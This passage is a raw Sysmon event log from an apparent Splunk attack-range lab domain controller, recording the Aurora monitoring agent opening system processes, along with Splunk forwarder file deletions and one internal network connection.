Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.809{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.695{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104A30CDBEAD002BFCC2018515FB3CFC,SHA256=41E5099BE436B463C9BC481C54AD73C648FDCAF4BF541CB5F40081E0589A506E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:11.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:12.714{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AA1725C94FC6893716F10AFE8975462,SHA256=DD79587153066F5CB85C9505873B1B0E333C62298B2F40CE3B76CB0BC5EB5FCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:12.186{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:13.791{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D476B069896B22D564EF51474B3AC307,SHA256=AEB9257B1D0A9AB16DCBFF53A0AA05667AED7FB88B6FD3089FDEC8BBF4A27D2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017340Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:13.042{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DE76C1C96FC2509F6387D5370F8662,SHA256=9033552AD367ABEDBD07CAD0BDF7898FEF8E534E1317B1E81511F219E0ACF720,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:10.652{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56402-false10.0.1.12-8000- 10341000x800000000000000044845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.833{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage.sqlite-journalMD5=2F8AEC125CD0FF9FBD02DAE93F61D82E,SHA256=B2B13348600C00646DCA24BCCF135CB50B87F0DAD164C6B7B7F95D25E87A5CDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.825{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walMD5=C25034226B269D6212F8900D4A634968,SHA256=3C3F7EF94FD7C036F2F3C0E0D4E4ACA525881B4C8E481A33C0AA47AC020F6E7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.824{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=24E1BE01C6ED3D209CC8B8E6153992CE,SHA256=B47A2E86619F43D2569BCD519234C53C36DA841142AE5488A1303315A3FFCC8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.819{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla 